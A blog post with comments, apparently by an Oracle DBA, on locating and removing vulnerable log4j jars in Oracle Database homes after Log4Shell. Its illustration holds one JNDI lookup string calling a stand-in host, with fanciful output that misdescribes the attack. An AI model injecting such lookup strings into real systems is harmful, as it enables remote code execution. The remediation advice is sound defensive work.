CVE-2021-44228 issue allows an user without authentication to execute code. It is tremendously easy to exploit, it is more a working-as-designed feature than a hard-core memory glitch.
Log4j is a logging library for java. If you enter some unexpected string, your web server may log it to a logfile.
- What’s your name?
- John
- What’s your age?
- 1000
- Come on, that’s not possible
2021-01-05 John says he's 1000
So far so good. But one log4j developer probably found useful to add variable expansion and the like
- What’s your name?
- John
- What’s your age?
- ${JNDI:ldaps://example.com/rm-rf-*}
- Come on, that’s not possible
2021-01-05 John says he's 1m files removed
Server attacked. This is of course best if multiple flaws exist, there is no firewalls and the web server logs everything with log4j.
Anyway, it isn’t a good feeling to be at risk.
It requires some carefull reading to check if Oracle Database is affected.
One may have check Oracle Support doc 2828877.1:
Oracle Database (all supported versions including 11.2, 12.1, 12.2, 19c, and 21c) are not affected by vulnerability CVE-2021-44228 or CVE-2021-45046.
But the innocent reader may stop here.
Let’s check some software, for instance RDBMS 19.6
$ find . -name "log4j-core*.jar" ./suptools/tfa/release/tfa_home/jlib/log4j-core-2.9.1.jar ./md/property_graph/lib/log4j-core-2.11.0.jar
What??? Is this not log4j around?
Other notes will tell CVE-2021-45105, CVE-2021-44228 and CVE-2021-45046 are addressed in AHF Version 21.4
$ suptools/tfa/release/tfa_home/bin/tfactl version /oracle/suptools/tfa/release/tfa_home/bin TFA Version : 183300 TFA Build ID : 20190315044534
So there I am at risk.
- WARNING: removing TFA prevents autopatch from patching
Two solutions : update TFA, if you need it or remove it with
tfactl uninstall
(rm will also do)
What does Oracle says about md ?
Vulnerabilities CVE-2021-44228, CVE-2021-45046, CVE-2021-45104, and CVE-2021-45105 concern Spatial in versions 12.2, 18.x, and 21.x.
If you use Spatial, then patch it. Otherwise, Oracle recommends to remove the whole md/property_graph directory (doc 2652121.1)
WARNING: this may impact cluster verify !
rm -r md/property_graph
12.1 (also client) has a few log4j-core jars, but version 1.x, which is older and less critical. But due to the log4j hystery, you may want to remove some of those, like $ORACLE_HOME/oui/jlib/jlib/log4j-core.
$ unzip -p -l oui/jlib/jlib/log4j-core.jar META-INF/MANIFEST.MF|grep Implementation-Version Implementation-Version: 1.1.1
Minimizing the impact of log4j is one thing, but pretending we’re unaffected isn’t really helpful.
One of those days, your secadmin will scan your server for old log4j classes, better remove yours now to avoid negative visibility
Hello
Something strange we need to remove md directory in grid home but clusterverify will not work anymore
Thank you
Hi Tga
That’s good to know, thanks. I have updated my post with this side effect.
I hope you can restore your file to fix your clusterverify
Thanks
Hi,
Thank you for this great post.
Concerning TFA, It is better to remove entire TFA_HOME or only log4j-core file?
Is there a risk if we TFA is not installed because it is too old, more than 180 days?
to guarantee patching, I guess you could empty the jar file …
cp /dev/null log4j-core.jar
so OPatch will still be able to archive the file. but it’s hard to predic what else will fail …